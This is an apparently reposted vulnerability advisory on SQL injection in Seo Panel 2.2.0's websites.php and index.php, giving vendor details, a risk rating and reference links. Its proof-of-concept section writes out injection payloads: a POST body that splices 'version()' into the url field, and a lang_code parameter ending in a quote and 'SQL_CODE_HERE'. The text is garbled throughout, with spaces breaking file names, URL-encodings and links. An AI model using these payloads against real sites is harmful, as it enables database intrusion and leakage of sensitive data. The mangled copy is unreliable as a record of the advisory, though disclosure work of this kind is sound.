Ps: 2.1.0 please see here: http://www.bkjia.com/Article/201011/77996.html
Seo Panel is a site management and SEO system. The websites. php and index. php In Seo Panel 2.2.0 have the SQL injection vulnerability, which may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
Seo Panel 2.2.0 SQL Injection Vulnerabilities
Product: Seo Panel
Vendor: http://www.seopanel.in/(http://www.seopanel.in /)
Vulnerable Version: 2.2.0
Vendor Notification: 01 February 2011
Vulnerability Type: SQL Injection
Risk level: High
Credit: High-Tech Bridge SA-Ethical Hacking & Penetration Testing (http://www.htbridge.ch /)
[+] Poc:
~~~~~~~~~
The following PoC is available:
POST/websites. php HTTP/1.1
Sec = create & name = 123 & url = http % 3A % 2F % 2F123% 2 Cversion () % 2C1% 2C1% 2C2% 2C1) % 2
0 -- % 20 & title = 1 & description = 1 & keywords = 1
Http: // [host]/index. php? & Lang_code = 1% 27SQL_CODE_HERE
[+] Reference:
~~~~~~~~~
Html> http://www.htbridge.ch/advisory/ SQL _injection_in_seo_panel_1.html
Http://www.htbridge.ch/advisory/ SQL _injection_in_seo_panel.html